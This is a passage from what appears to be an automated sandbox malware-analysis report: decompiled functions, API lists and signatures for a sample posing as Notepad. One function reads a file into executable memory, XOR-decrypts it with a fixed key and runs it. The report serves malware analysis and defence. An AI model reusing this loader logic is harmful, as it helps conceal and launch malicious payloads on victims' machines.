				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                  0x0041e6b2
                                                  0x0041e6b2
                                                  0x0041e6ba
                                                  0x0041e6e8
                                                  0x0041e6ec

                                                  APIs
                                                  • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                  • Instruction ID: a52c969a109bbc10a8a1a781a5aa37a0394cb6bb67041f9c77339075023d92d4
                                                  • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                  • Instruction Fuzzy Hash: 4EF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BA0DA7241C630E8118BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E7D3 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 226 41e7d3-41e7e9 227 41e7ef-41e810 NtAllocateVirtualMemory 226->227 228 41e7ea call 41f243 226->228 228->227
                                                  C-Code - Quality: 100%
                                                  			E0041E7D3(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                  0x0041e7ea
                                                  0x0041e80c
                                                  0x0041e810

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                  • Instruction ID: 27bf8a3fb07fce7131f8418fc0fb77bd2b10fdbd594230fdd84e61d9d7c2cc87
                                                  • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                  • Instruction Fuzzy Hash: BBF01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159BE0897241C630F911CBB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E723 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041E723(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                  0x0041e73a
                                                  0x0041e748
                                                  0x0041e74c

                                                  APIs
                                                  • NtClose.NTDLL(00410328,00000000,?,00410328,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E748
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                  • Instruction ID: 9c4ed7dd7ad381e5692115c9670513ce9f617838e6ca6e8741f9ee3af2ac2269
                                                  • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                  • Instruction Fuzzy Hash: 3CD01776604214ABD610EBA9DC89FD77BACDF48664F0184A9BA1C5B242C571FA0086E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E943 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3 41e943-41e96f call 41f243 ExitProcess
                                                  C-Code - Quality: 100%
                                                  			E0041E943(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F243( *((intOrPtr*)(_a4 + 0x164)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x164)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                  0x0041e946
                                                  0x0041e95d
                                                  0x0041e96b

                                                  APIs
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID: w5@
                                                  • API String ID: 621844428-2048009441
                                                  • Opcode ID: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                                  • Instruction ID: 28662ead1a8a2610f8e7ad364a80deeb4b3648c83f3036173ff49b3b7ba48b6c
                                                  • Opcode Fuzzy Hash: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                                  • Instruction Fuzzy Hash: CAD01776A003147BCA20EB99CC85FD777ACDF457A4F0180A5BA4C5B282C675BA00C7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E935 Relevance: 3.0, APIs: 2, Instructions: 36memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 21%
                                                  			E0041E935() {

				asm("daa");
				asm("int 0xa2");
				asm("loope 0xffffff9e");
				asm("stc");
				_push(0x9f547df3);
				_t7 =  *0xFFFFFFFF8BEC8B5D;
				E0041F243( *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), _t7, _t7 + 0xaa8,  *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), 0, 0x36);
				ExitProcess( *0xFFFFFFFF8BEC8B61);
			}



                                                  0x0041e935
                                                  0x0041e938
                                                  0x0041e93a
                                                  0x0041e93c
                                                  0x0041e93d
                                                  0x0041e946
                                                  0x0041e95d
                                                  0x0041e96b

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateExitHeapProcess
                                                  • String ID:
                                                  • API String ID: 1054155344-0
                                                  • Opcode ID: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                  • Instruction ID: cf9cc797f96d59935dff7869ae2ce17e4b40744dbe2bb0b75c86a5cc178cc62b
                                                  • Opcode Fuzzy Hash: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                  • Instruction Fuzzy Hash: 5EF024B8A041006BC710DBA4CC85ED33BA8EF85204F144499BC980B202C179E91583F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004098A3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 84%
                                                  			E004098A3(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420213( &_v67, 0, 0x3f);
				E00420CC3( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF23(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419603(_a4 + 0x20, _t13, 0, 0, E00402E13(0x2ef2527b));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C5F3(1, 8, _t19 + 0x540) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                  0x004098a3
                                                  0x004098b4
                                                  0x004098b8
                                                  0x004098c3
                                                  0x004098c8
                                                  0x004098d3
                                                  0x004098eb
                                                  0x004098f0
                                                  0x004098f7
                                                  0x004098f9
                                                  0x00409906
                                                  0x0040990a
                                                  0x00000000
                                                  0x0040992e
                                                  0x0040990a
                                                  0x00409936

                                                  APIs
                                                  • PostThreadMessageW.USER32(000072B1,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409906
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                  • Instruction ID: 8f2db9fe8dd4293e769d4f79dd02f83159bb7ad0b88680d8187a7f3a5710d2c7
                                                  • Opcode Fuzzy Hash: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                  • Instruction Fuzzy Hash: 6C019B71A4022876E720A695DC82FEF775C9B45B54F14012DFB047A2C2D6A8AD0647F9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E8F5 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 229 41e8f5-41e901 230 41e930-41e934 RtlFreeHeap 229->230 231 41e903-41e91a call 41f243 229->231 233 41e91f-41e92f 231->233 233->230
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                  • Instruction ID: 1f4064dec4080926383eea4deb29f94a4842a973331a5e3ad2f339e89f1cfb14
                                                  • Opcode Fuzzy Hash: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                  • Instruction Fuzzy Hash: A9F085B5210208ABCB18EF89CC48EA777A8EF88310F004959F90967252C634FA05CAA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E8C3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 239 41e8c3-41e8f4 call 41f243 RtlAllocateHeap
                                                  C-Code - Quality: 100%
                                                  			E0041E8C3(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                  0x0041e8d2
                                                  0x0041e8da
                                                  0x0041e8f0
                                                  0x0041e8f4

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                  • Instruction ID: 54a437fc11085ca12ae2a9f31c46b1b25ee2b1612e845e8a2c08afeac8ca904d
                                                  • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                  • Instruction Fuzzy Hash: 67E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C670F914CAF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004100A3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 234 4100a3-4100bc 235 4100c2-4100c7 234->235 236 4100bd call 419603 234->236 237 4100c9-4100ca 235->237 238 4100cb-4100dc GetUserGeoID 235->238 236->235
                                                  C-Code - Quality: 37%
                                                  			E004100A3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419603(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                  0x004100bd
                                                  0x004100c7
                                                  0x004100cd
                                                  0x004100dc
                                                  0x004100ca
                                                  0x004100ca
                                                  0x004100ca

                                                  APIs
                                                  • GetUserGeoID.KERNELBASE(00000010), ref: 004100CD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: User
                                                  • String ID:
                                                  • API String ID: 765557111-0
                                                  • Opcode ID: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                  • Instruction ID: c28064bcec0e87ed17199b1c401a6025e046bcfeae29810ee43e910d84b218be
                                                  • Opcode Fuzzy Hash: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                  • Instruction Fuzzy Hash: AAE0C27368030426F72091A59C86FA6364E5B84B00F088475F90CD72C2D598E8C01024
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E903 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                  • Instruction ID: 7d567fb0b9b374d2fcadea76b5f186a9fefaaa7f04dd58c50085a667477643af
                                                  • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                  • Instruction Fuzzy Hash: E8E012B5600208ABCB14EF89DC49EA737ACAF88754F018059BA095B282C670E914CAB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041EA63 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0041EA63(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F243( *((intOrPtr*)(_a4 + 0x2f8)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x2f8)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                  0x0041ea7d
                                                  0x0041ea93
                                                  0x0041ea97

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEF5,0040FEF5,?,00000000,?,?), ref: 0041EA93
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                  • Instruction ID: 441ee85fda3589afd26e41ae61f19a3667434cbc207aca3ddcc64c5dc7615bd2
                                                  • Opcode Fuzzy Hash: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                  • Instruction Fuzzy Hash: 13E01AB56002046BC710DF89CC45EE777ADAF88654F014165BA0857242C675E9548AB5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 010A28A0 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 181windowregistrymemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E010A28A0(void* __edx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12, int _a16) {
				struct _WNDCLASSEXW _v52;
				struct tagMONITORINFO _v100;
				struct tagMSG _v128;
				struct HACCEL__* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				char* _t47;
				int _t49;
				struct HMONITOR__* _t54;
				int _t62;
				int _t65;
				int _t67;
				int _t69;
				void* _t78;
				void* _t80;
				intOrPtr* _t81;
				int _t85;
				void* _t92;
				long _t93;
				struct HINSTANCE__* _t94;
				void* _t99;
				signed int _t100;

				_push(_t80);
				_push(_t92);
				_t38 = E010A3542(_a12, "rb");
				_push(2);
				_t99 = _t38;
				_push(0);
				_push(_t99);
				E010A3C76(_t80, __edx, _t92, _t99, __eflags);
				_push(_t99);
				_t93 = E010A3B7F(_t80, __edx, _t92, _t99, __eflags);
				_push(0);
				_push(0);
				_push(_t99);
				E010A3C76(_t80, __edx, _t93, _t99, __eflags);
				_t81 = VirtualAlloc(0, _t93, 0x3000, 0x40);
				E010A377A(_t81, _t93, 1, _t99);
				_t100 = 0;
				if(_t93 != 0) {
					do {
						_t78 = _t100 - ((0xaaaaaaab * _t100 >> 0x20 >> 3) + (0xaaaaaaab * _t100 >> 0x20 >> 3) * 2 << 2);
						_t100 = _t100 + 1;
						_t8 = _t78 + "248058040134"; // 0x30383432
						 *(_t81 + _t100 - 1) =  *(_t81 + _t100 - 1) ^  *_t8;
					} while (_t100 < _t93);
				}
				 *_t81();
				__imp__#17();
				 *0x10c2dac = RegisterWindowMessageW(L"commdlg_FindReplace");
				E010A66E0(0x10c3f20, 0, 0x11f4);
				_t94 = _a4;
				 *0x10c3f20 = _t94;
				_t85 = 0x30;
				_t47 =  &_v52;
				do {
					 *_t47 = 0;
					_t47 = _t47 + 1;
					_t85 = _t85 - 1;
				} while (_t85 != 0);
				_v52.cbSize = 0x30;
				_v52.lpfnWndProc = 0x10a2890;
				_v52.hInstance = _t94;
				_v52.hIcon = LoadIconW(_t94, 0x300);
				_t49 = GetSystemMetrics(0x32);
				_v52.hIconSm = LoadImageW( *0x10c3f20, 0x300, 1, GetSystemMetrics(0x31), _t49, 0x8000);
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = 6;
				_v52.lpszMenuName = 0x201;
				_v52.lpszClassName = L"Notepad";
				_t54 = RegisterClassExW( &_v52);
				if(_t54 != 0) {
					__imp__MonitorFromRect(0x10c2d9c, 1);
					_v100.cbSize = 0x28;
					GetMonitorInfoW(_t54,  &_v100);
					__eflags =  *0x10c3f24;
					if( *0x10c3f24 == 0) {
						ExitProcess(1);
					}
					E010A1420();
					ShowWindow( *0x10c3f24, _a16);
					UpdateWindow( *0x10c3f24);
					DragAcceptFiles( *0x10c3f24, 1);
					GetCommandLineW();
					_v132 = LoadAcceleratorsW(_t94, 0x203);
					_t62 = GetMessageW( &_v128, 0, 0, 0);
					__eflags = _t62;
					if(_t62 != 0) {
						do {
							_t65 = IsDialogMessageW( *0x10c3f28,  &_v128);
							__eflags = _t65;
							if(_t65 == 0) {
								_t69 = TranslateAcceleratorW( *0x10c3f24, _v132,  &_v128);
								__eflags = _t69;
								if(_t69 == 0) {
									TranslateMessage( &_v128);
									DispatchMessageW( &_v128);
								}
							}
							_t67 = GetMessageW( &_v128, 0, 0, 0);
							__eflags = _t67;
						} while (_t67 != 0);
					}
					return _v128.wParam;
				} else {
					return 0;
				}
			}




























                                                  0x010a28a9
                                                  0x010a28ab
                                                  0x010a28b4
                                                  0x010a28b9
                                                  0x010a28bb
                                                  0x010a28bd
                                                  0x010a28bf
                                                  0x010a28c0
                                                  0x010a28c8
                                                  0x010a28d1
                                                  0x010a28d3
                                                  0x010a28d5
                                                  0x010a28d7
                                                  0x010a28d8
                                                  0x010a28f3
                                                  0x010a28f7
                                                  0x010a28ff
                                                  0x010a2903
                                                  0x010a2905
                                                  0x010a2917
                                                  0x010a2919
                                                  0x010a291a
                                                  0x010a2920
                                                  0x010a2924
                                                  0x010a2905
                                                  0x010a2928
                                                  0x010a292a
                                                  0x010a2947
                                                  0x010a294d
                                                  0x010a2952
                                                  0x010a2958
                                                  0x010a295e
                                                  0x010a2963
                                                  0x010a2967
                                                  0x010a2967
                                                  0x010a296a
                                                  0x010a296d
                                                  0x010a296d
                                                  0x010a2976
                                                  0x010a297e
                                                  0x010a2986
                                                  0x010a299d
                                                  0x010a29a1
                                                  0x010a29c3
                                                  0x010a29d0
                                                  0x010a29d9
                                                  0x010a29e1
                                                  0x010a29ec
                                                  0x010a29f7
                                                  0x010a2a00
                                                  0x010a2a14
                                                  0x010a2a20
                                                  0x010a2a28
                                                  0x010a2a2e
                                                  0x010a2a35
                                                  0x010a2a39
                                                  0x010a2a39
                                                  0x010a2a3f
                                                  0x010a2a4d
                                                  0x010a2a59
                                                  0x010a2a67
                                                  0x010a2a6d
                                                  0x010a2a89
                                                  0x010a2a94
                                                  0x010a2a96
                                                  0x010a2a98
                                                  0x010a2ab0
                                                  0x010a2abb
                                                  0x010a2ac1
                                                  0x010a2ac3
                                                  0x010a2ad4
                                                  0x010a2ada
                                                  0x010a2adc
                                                  0x010a2ae3
                                                  0x010a2aea
                                                  0x010a2aea
                                                  0x010a2adc
                                                  0x010a2af7
                                                  0x010a2af9
                                                  0x010a2af9
                                                  0x010a2ab0
                                                  0x010a2b07
                                                  0x010a2a02
                                                  0x010a2a0a
                                                  0x010a2a0a

                                                  APIs
                                                    • Part of subcall function 010A3542: __fsopen.LIBCMT ref: 010A354D
                                                  • _fseek.LIBCMT ref: 010A28C0
                                                  • _fseek.LIBCMT ref: 010A28D8
                                                    • Part of subcall function 010A3C76: __lock_file.LIBCMT ref: 010A3CB7
                                                    • Part of subcall function 010A3C76: __fseek_nolock.LIBCMT ref: 010A3CC6
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,?,?,?,?,?,?,00000000), ref: 010A28EA
                                                  • __fread_nolock.LIBCMT ref: 010A28F7
                                                  • #17.COMCTL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010A292A
                                                  • RegisterWindowMessageW.USER32(commdlg_FindReplace,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010A2935
                                                  • _memset.LIBCMT ref: 010A294D
                                                  • LoadIconW.USER32 ref: 010A298A
                                                  • GetSystemMetrics.USER32 ref: 010A29A1
                                                  • GetSystemMetrics.USER32 ref: 010A29A6
                                                  • LoadImageW.USER32 ref: 010A29B6
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 010A29CA
                                                  • RegisterClassExW.USER32 ref: 010A29F7
                                                  • MonitorFromRect.USER32(010C2D9C,00000001), ref: 010A2A14
                                                  • GetMonitorInfoW.USER32 ref: 010A2A28
                                                  • ExitProcess.KERNEL32 ref: 010A2A39
                                                    • Part of subcall function 010A1420: GetWindowTextLengthW.USER32(0001FF42), ref: 010A1427
                                                    • Part of subcall function 010A1420: SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A143E
                                                  • ShowWindow.USER32(?,?,?,?,?,?,?,?), ref: 010A2A4D
                                                  • UpdateWindow.USER32 ref: 010A2A59
                                                  • DragAcceptFiles.SHELL32(00000001,?,?,?,?,?,?,?), ref: 010A2A67
                                                  • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?), ref: 010A2A6D
                                                  • LoadAcceleratorsW.USER32 ref: 010A2A79
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2A94
                                                  • IsDialogMessageW.USER32(?), ref: 010A2ABB
                                                  • TranslateAcceleratorW.USER32(?,?), ref: 010A2AD4
                                                  • TranslateMessage.USER32(?), ref: 010A2AE3
                                                  • DispatchMessageW.USER32 ref: 010A2AEA
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2AF7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Message$LoadWindow$MetricsMonitorRegisterSystemTranslate_fseek$AcceleratorAcceleratorsAcceptAllocClassCommandCursorDialogDispatchDragExitFilesFromIconImageInfoLengthLineProcessRectSendShowTextUpdateVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_memset
                                                  • String ID: ($0$Notepad$commdlg_FindReplace
                                                  • API String ID: 1672473475-3416331526
                                                  • Opcode ID: f8d20d228c65e057ec61dd4220d35292c206ccab7122985762876c5affa35050
                                                  • Instruction ID: 371b7687be9af811e0789ca4951b30671ce9d30513af48d672cbe41d9ad7ca59
                                                  • Opcode Fuzzy Hash: f8d20d228c65e057ec61dd4220d35292c206ccab7122985762876c5affa35050
                                                  • Instruction Fuzzy Hash: 2251C472544301AFE720AFE4DD89FDB7BE8FB44B40F404429F6C59A194D7B69904CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1CB0 Relevance: 66.7, APIs: 33, Strings: 5, Instructions: 241memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E010A1CB0() {
				signed int _v8;
				int _v12;
				void* _v16;
				intOrPtr _v50;
				signed int _v52;
				intOrPtr _v56;
				signed int _v58;
				signed short _v60;
				signed int _v64;
				struct HDC__* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				struct tagPD _v84;
				void* _v88;
				long _v92;
				char* _v96;
				signed int _v100;
				void* _v104;
				struct _DOCINFOW _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v168;
				intOrPtr _v176;
				signed char _v196;
				signed int _v200;
